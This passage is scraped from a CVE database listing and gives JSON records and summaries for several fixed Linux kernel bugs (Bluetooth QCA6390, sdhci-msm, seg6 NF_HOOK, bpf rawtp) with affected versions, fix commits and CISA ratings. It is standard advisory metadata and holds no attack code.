          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2d8aa4c763593704ac21e7591aed4f13e32f3b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/977b9dc65e14fb80de4763d949c7dec2ecb15b9b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/88e72239ead9814b886db54fc4ee39ef3c2b8f26"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42137",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:06.425192Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:35.827Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/bluetooth/hci_qca.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "215a26c2404fa34625c725d446967fa328a703eb",
              "status": "affected",
              "version": "e84ec6e25df9bb0968599e92eacedaf3a0a5b587",
              "versionType": "git"
            },
            {
              "lessThan": "4ca6013cd18e58ac1044908c40d4006a92093a11",
              "status": "affected",
              "version": "908d1742b6e694e84ead5c62e4b7c1bfbb8b46a3",
              "versionType": "git"
            },
            {
              "lessThan": "e6e200b264271f62a3fadb51ada9423015ece37b",
              "status": "affected",
              "version": "ea3ebda47dd56f6e1c62f2e0e1b6e1b0a973e447",
              "versionType": "git"
            },
            {
              "lessThan": "e2d8aa4c763593704ac21e7591aed4f13e32f3b5",
              "status": "affected",
              "version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
              "versionType": "git"
            },
            {
              "lessThan": "977b9dc65e14fb80de4763d949c7dec2ecb15b9b",
              "status": "affected",
              "version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
              "versionType": "git"
            },
            {
              "lessThan": "88e72239ead9814b886db54fc4ee39ef3c2b8f26",
              "status": "affected",
              "version": "272970be3dabd24cbe50e393ffee8f04aec3b9a8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/bluetooth/hci_qca.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.2"
            },
            {
              "lessThan": "6.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.10.165",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.90",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot\n\nCommit 272970be3dab (\"Bluetooth: hci_qca: Fix driver shutdown on closed\nserdev\") will cause below regression issue:\n\nBT can\u0027t be enabled after below steps:\ncold boot -\u003e enable BT -\u003e disable BT -\u003e warm reboot -\u003e BT enable failure\nif property enable-gpios is not configured within DT|ACPI for QCA6390.\n\nThe commit is to fix a use-after-free issue within qca_serdev_shutdown()\nby adding condition to avoid the serdev is flushed or wrote after closed\nbut also introduces this regression issue regarding above steps since the\nVSC is not sent to reset controller during warm reboot.\n\nFixed by sending the VSC to reset controller within qca_serdev_shutdown()\nonce BT was ever enabled, and the use-after-free issue is also fixed by\nthis change since the serdev is still opened before it is flushed or wrote.\n\nVerified by the reported machine Dell XPS 13 9310 laptop over below two\nkernel commits:\ncommit e00fc2700a3f (\"Bluetooth: btusb: Fix triggering coredump\nimplementation for QCA\") of bluetooth-next tree.\ncommit b23d98d46d28 (\"Bluetooth: btusb: Fix triggering coredump\nimplementation for QCA\") of linus mainline tree."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:23:54.718Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/215a26c2404fa34625c725d446967fa328a703eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ca6013cd18e58ac1044908c40d4006a92093a11"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6e200b264271f62a3fadb51ada9423015ece37b"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2d8aa4c763593704ac21e7591aed4f13e32f3b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/977b9dc65e14fb80de4763d949c7dec2ecb15b9b"
        },
        {
          "url": "https://git.kernel.org/stable/c/88e72239ead9814b886db54fc4ee39ef3c2b8f26"
        }
      ],
      "title": "Bluetooth: qca: Fix BT enable failure again for QCA6390 after warm reboot",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42137",
    "datePublished": "2024-07-30T07:46:31.748Z",
    "dateReserved": "2024-07-29T15:50:41.188Z",
    "dateUpdated": "2025-11-03T22:02:05.374Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36029 (GCVE-0-2024-36029)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:19 – Updated: 2025-05-04 09:10

Title

mmc: sdhci-msm: pervent access to suspended controller

Summary

In the Linux kernel, the following vulnerability has been resolved: mmc: sdhci-msm: pervent access to suspended controller Generic sdhci code registers LED device and uses host->runtime_suspended flag to protect access to it. The sdhci-msm driver doesn't set this flag, which causes a crash when LED is accessed while controller is runtime suspended. Fix this by setting the flag correctly.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1200481cd6069d16c…
	https://git.kernel.org/stable/c/a957ea5aa3d351806…
	https://git.kernel.org/stable/c/56b99a52229d7f8cd…
	https://git.kernel.org/stable/c/f653b04a818c490b0…
	https://git.kernel.org/stable/c/f8def10f73a516b77…

Impacted products

Vendor

Product

Version

Linux

Affected: 67e6db113c903f2b8af924400b7b43ade4b9ac5c , < 1200481cd6069d16ce20133bcd86f5825e26a045 (git)
Affected: 67e6db113c903f2b8af924400b7b43ade4b9ac5c , < a957ea5aa3d3518067a1ba32c6127322ad348d20 (git)
Affected: 67e6db113c903f2b8af924400b7b43ade4b9ac5c , < 56b99a52229d7f8cd1f53d899f57aa7eb4b199af (git)
Affected: 67e6db113c903f2b8af924400b7b43ade4b9ac5c , < f653b04a818c490b045c97834d559911479aa1c5 (git)
Affected: 67e6db113c903f2b8af924400b7b43ade4b9ac5c , < f8def10f73a516b771051a2f70f2f0446902cb4f (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36029",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-12T19:34:39.267848Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-12T19:34:47.223Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.966Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1200481cd6069d16ce20133bcd86f5825e26a045"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a957ea5aa3d3518067a1ba32c6127322ad348d20"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/56b99a52229d7f8cd1f53d899f57aa7eb4b199af"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f653b04a818c490b045c97834d559911479aa1c5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f8def10f73a516b771051a2f70f2f0446902cb4f"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/mmc/host/sdhci-msm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1200481cd6069d16ce20133bcd86f5825e26a045",
              "status": "affected",
              "version": "67e6db113c903f2b8af924400b7b43ade4b9ac5c",
              "versionType": "git"
            },
            {
              "lessThan": "a957ea5aa3d3518067a1ba32c6127322ad348d20",
              "status": "affected",
              "version": "67e6db113c903f2b8af924400b7b43ade4b9ac5c",
              "versionType": "git"
            },
            {
              "lessThan": "56b99a52229d7f8cd1f53d899f57aa7eb4b199af",
              "status": "affected",
              "version": "67e6db113c903f2b8af924400b7b43ade4b9ac5c",
              "versionType": "git"
            },
            {
              "lessThan": "f653b04a818c490b045c97834d559911479aa1c5",
              "status": "affected",
              "version": "67e6db113c903f2b8af924400b7b43ade4b9ac5c",
              "versionType": "git"
            },
            {
              "lessThan": "f8def10f73a516b771051a2f70f2f0446902cb4f",
              "status": "affected",
              "version": "67e6db113c903f2b8af924400b7b43ade4b9ac5c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/mmc/host/sdhci-msm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: sdhci-msm: pervent access to suspended controller\n\nGeneric sdhci code registers LED device and uses host-\u003eruntime_suspended\nflag to protect access to it. The sdhci-msm driver doesn\u0027t set this flag,\nwhich causes a crash when LED is accessed while controller is runtime\nsuspended. Fix this by setting the flag correctly."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:53.920Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1200481cd6069d16ce20133bcd86f5825e26a045"
        },
        {
          "url": "https://git.kernel.org/stable/c/a957ea5aa3d3518067a1ba32c6127322ad348d20"
        },
        {
          "url": "https://git.kernel.org/stable/c/56b99a52229d7f8cd1f53d899f57aa7eb4b199af"
        },
        {
          "url": "https://git.kernel.org/stable/c/f653b04a818c490b045c97834d559911479aa1c5"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8def10f73a516b771051a2f70f2f0446902cb4f"
        }
      ],
      "title": "mmc: sdhci-msm: pervent access to suspended controller",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36029",
    "datePublished": "2024-05-30T15:19:43.110Z",
    "dateReserved": "2024-05-17T13:50:33.160Z",
    "dateUpdated": "2025-05-04T09:10:53.920Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40957 (GCVE-0-2024-40957)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:31 – Updated: 2025-11-03 21:58

Title

seg6: fix parameter passing when calling NF_HOOK() in End.DX4 and End.DX6 behaviors

Summary

In the Linux kernel, the following vulnerability has been resolved: seg6: fix parameter passing when calling NF_HOOK() in End.DX4 and End.DX6 behaviors input_action_end_dx4() and input_action_end_dx6() are called NF_HOOK() for PREROUTING hook, in PREROUTING hook, we should passing a valid indev, and a NULL outdev to NF_HOOK(), otherwise may trigger a NULL pointer dereference, as below: [74830.647293] BUG: kernel NULL pointer dereference, address: 0000000000000090 [74830.655633] #PF: supervisor read access in kernel mode [74830.657888] #PF: error_code(0x0000) - not-present page [74830.659500] PGD 0 P4D 0 [74830.660450] Oops: 0000 [#1] PREEMPT SMP PTI ... [74830.664953] Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011 [74830.666569] RIP: 0010:rpfilter_mt+0x44/0x15e [ipt_rpfilter] ... [74830.689725] Call Trace: [74830.690402] <IRQ> [74830.690953] ? show_trace_log_lvl+0x1c4/0x2df [74830.692020] ? show_trace_log_lvl+0x1c4/0x2df [74830.693095] ? ipt_do_table+0x286/0x710 [ip_tables] [74830.694275] ? __die_body.cold+0x8/0xd [74830.695205] ? page_fault_oops+0xac/0x140 [74830.696244] ? exc_page_fault+0x62/0x150 [74830.697225] ? asm_exc_page_fault+0x22/0x30 [74830.698344] ? rpfilter_mt+0x44/0x15e [ipt_rpfilter] [74830.699540] ipt_do_table+0x286/0x710 [ip_tables] [74830.700758] ? ip6_route_input+0x19d/0x240 [74830.701752] nf_hook_slow+0x3f/0xb0 [74830.702678] input_action_end_dx4+0x19b/0x1e0 [74830.703735] ? input_action_end_t+0xe0/0xe0 [74830.704734] seg6_local_input_core+0x2d/0x60 [74830.705782] lwtunnel_input+0x5b/0xb0 [74830.706690] __netif_receive_skb_one_core+0x63/0xa0 [74830.707825] process_backlog+0x99/0x140 [74830.709538] __napi_poll+0x2c/0x160 [74830.710673] net_rx_action+0x296/0x350 [74830.711860] __do_softirq+0xcb/0x2ac [74830.713049] do_softirq+0x63/0x90 input_action_end_dx4() passing a NULL indev to NF_HOOK(), and finally trigger a NULL dereference in rpfilter_mt()->rpfilter_is_loopback(): static bool rpfilter_is_loopback(const struct sk_buff *skb, const struct net_device *in) { // in is NULL return skb->pkt_type == PACKET_LOOPBACK || in->flags & IFF_LOOPBACK; }

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/af90e3d73dc457787…
	https://git.kernel.org/stable/c/ec4d970b597ee5e17…
	https://git.kernel.org/stable/c/d62df86c172033679…
	https://git.kernel.org/stable/c/561475d53aa7e4511…
	https://git.kernel.org/stable/c/9a3bc8d16e0aacd65…

Impacted products

Vendor

Product

Version

Linux

Affected: 7a3f5b0de3647c854e34269c3332d7a1e902901a , < af90e3d73dc45778767b2fb6e7edd57ebe34380d (git)
Affected: 7a3f5b0de3647c854e34269c3332d7a1e902901a , < ec4d970b597ee5e17b0d8d73b7875197ce9a04d4 (git)
Affected: 7a3f5b0de3647c854e34269c3332d7a1e902901a , < d62df86c172033679d744f07d89e93e367dd11f6 (git)
Affected: 7a3f5b0de3647c854e34269c3332d7a1e902901a , < 561475d53aa7e4511ee7cdba8728ded81cf1db1c (git)
Affected: 7a3f5b0de3647c854e34269c3332d7a1e902901a , < 9a3bc8d16e0aacd65c31aaf23a2bced3288a7779 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:21.536Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af90e3d73dc45778767b2fb6e7edd57ebe34380d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ec4d970b597ee5e17b0d8d73b7875197ce9a04d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d62df86c172033679d744f07d89e93e367dd11f6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/561475d53aa7e4511ee7cdba8728ded81cf1db1c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9a3bc8d16e0aacd65c31aaf23a2bced3288a7779"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40957",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:38.761289Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:24.035Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/seg6_local.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "af90e3d73dc45778767b2fb6e7edd57ebe34380d",
              "status": "affected",
              "version": "7a3f5b0de3647c854e34269c3332d7a1e902901a",
              "versionType": "git"
            },
            {
              "lessThan": "ec4d970b597ee5e17b0d8d73b7875197ce9a04d4",
              "status": "affected",
              "version": "7a3f5b0de3647c854e34269c3332d7a1e902901a",
              "versionType": "git"
            },
            {
              "lessThan": "d62df86c172033679d744f07d89e93e367dd11f6",
              "status": "affected",
              "version": "7a3f5b0de3647c854e34269c3332d7a1e902901a",
              "versionType": "git"
            },
            {
              "lessThan": "561475d53aa7e4511ee7cdba8728ded81cf1db1c",
              "status": "affected",
              "version": "7a3f5b0de3647c854e34269c3332d7a1e902901a",
              "versionType": "git"
            },
            {
              "lessThan": "9a3bc8d16e0aacd65c31aaf23a2bced3288a7779",
              "status": "affected",
              "version": "7a3f5b0de3647c854e34269c3332d7a1e902901a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/seg6_local.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nseg6: fix parameter passing when calling NF_HOOK() in End.DX4 and End.DX6 behaviors\n\ninput_action_end_dx4() and input_action_end_dx6() are called NF_HOOK() for\nPREROUTING hook, in PREROUTING hook, we should passing a valid indev,\nand a NULL outdev to NF_HOOK(), otherwise may trigger a NULL pointer\ndereference, as below:\n\n    [74830.647293] BUG: kernel NULL pointer dereference, address: 0000000000000090\n    [74830.655633] #PF: supervisor read access in kernel mode\n    [74830.657888] #PF: error_code(0x0000) - not-present page\n    [74830.659500] PGD 0 P4D 0\n    [74830.660450] Oops: 0000 [#1] PREEMPT SMP PTI\n    ...\n    [74830.664953] Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011\n    [74830.666569] RIP: 0010:rpfilter_mt+0x44/0x15e [ipt_rpfilter]\n    ...\n    [74830.689725] Call Trace:\n    [74830.690402]  \u003cIRQ\u003e\n    [74830.690953]  ? show_trace_log_lvl+0x1c4/0x2df\n    [74830.692020]  ? show_trace_log_lvl+0x1c4/0x2df\n    [74830.693095]  ? ipt_do_table+0x286/0x710 [ip_tables]\n    [74830.694275]  ? __die_body.cold+0x8/0xd\n    [74830.695205]  ? page_fault_oops+0xac/0x140\n    [74830.696244]  ? exc_page_fault+0x62/0x150\n    [74830.697225]  ? asm_exc_page_fault+0x22/0x30\n    [74830.698344]  ? rpfilter_mt+0x44/0x15e [ipt_rpfilter]\n    [74830.699540]  ipt_do_table+0x286/0x710 [ip_tables]\n    [74830.700758]  ? ip6_route_input+0x19d/0x240\n    [74830.701752]  nf_hook_slow+0x3f/0xb0\n    [74830.702678]  input_action_end_dx4+0x19b/0x1e0\n    [74830.703735]  ? input_action_end_t+0xe0/0xe0\n    [74830.704734]  seg6_local_input_core+0x2d/0x60\n    [74830.705782]  lwtunnel_input+0x5b/0xb0\n    [74830.706690]  __netif_receive_skb_one_core+0x63/0xa0\n    [74830.707825]  process_backlog+0x99/0x140\n    [74830.709538]  __napi_poll+0x2c/0x160\n    [74830.710673]  net_rx_action+0x296/0x350\n    [74830.711860]  __do_softirq+0xcb/0x2ac\n    [74830.713049]  do_softirq+0x63/0x90\n\ninput_action_end_dx4() passing a NULL indev to NF_HOOK(), and finally\ntrigger a NULL dereference in rpfilter_mt()-\u003erpfilter_is_loopback():\n\n    static bool\n    rpfilter_is_loopback(const struct sk_buff *skb,\n          \t       const struct net_device *in)\n    {\n            // in is NULL\n            return skb-\u003epkt_type == PACKET_LOOPBACK ||\n          \t in-\u003eflags \u0026 IFF_LOOPBACK;\n    }"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:46.357Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/af90e3d73dc45778767b2fb6e7edd57ebe34380d"
        },
        {
          "url": "https://git.kernel.org/stable/c/ec4d970b597ee5e17b0d8d73b7875197ce9a04d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d62df86c172033679d744f07d89e93e367dd11f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/561475d53aa7e4511ee7cdba8728ded81cf1db1c"
        },
        {
          "url": "https://git.kernel.org/stable/c/9a3bc8d16e0aacd65c31aaf23a2bced3288a7779"
        }
      ],
      "title": "seg6: fix parameter passing when calling NF_HOOK() in End.DX4 and End.DX6 behaviors",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40957",
    "datePublished": "2024-07-12T12:31:59.747Z",
    "dateReserved": "2024-07-12T12:17:45.593Z",
    "dateUpdated": "2025-11-03T21:58:21.536Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40908 (GCVE-0-2024-40908)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2025-11-03 21:57

Title

bpf: Set run context for rawtp test_run callback

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Set run context for rawtp test_run callback syzbot reported crash when rawtp program executed through the test_run interface calls bpf_get_attach_cookie helper or any other helper that touches task->bpf_ctx pointer. Setting the run context (task->bpf_ctx pointer) for test_run callback.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/789bd77c9342aa612…
	https://git.kernel.org/stable/c/3708b6c2546c9eb34…
